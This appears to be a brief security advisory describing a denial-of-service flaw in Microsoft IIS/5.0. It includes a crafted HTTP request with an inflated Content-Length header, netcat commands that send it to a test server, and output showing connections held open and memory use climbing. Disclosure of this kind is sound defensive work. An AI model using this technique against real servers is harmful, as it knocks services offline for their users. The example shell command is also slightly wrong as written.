|
|
|
|
| |
| A security flaw in the way IIS handles mislabeled Content-Length requests (requests containing HTTP Content-Length without an adequate content length). The security flaw can cause the server to consume massive amount of memory that can lead a denial of service attack. |
| |
Credit:
The information has been provided by Ivan Hernandez Puga.
|
| |
The vulnerability by itself is not a security flaw, but it probably can lead into denial of service with some tweaking. When you send a bad request to Microsoft IIS/5.0 server, it gives you the error and closes the connection, like when you fail to authenticate.
Example (1):
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic
Then let us add a "Content-Length: 5300643" field.
When you send the request to the server, it will hang there waiting something to happen and never close the connection.
Example (2):
$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt
$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
PID PPID PGID WINPID TTY UID STIME COMMAND
696 1 696 696 con 500 12:22:37 /usr/bin/bash
2464 696 2464 2464 con 500 12:23:56 /usr/bin/nc
2532 696 2532 1552 con 500 12:29:16 /usr/bin/ps
$ netstat -an |grep 192.168.0.10
TCP 192.168.0.4:2479 192.168.0.10:80 ESTABLISHED
Now you have a waiting open connection. You can open as much as you want. The server never stops the connections and you should never see a timeout.
For something like 4322 open connections with the method described the Windows server will memory consumption will jump from around 404mb to 920mb.
|
|
|
|
|
|
|
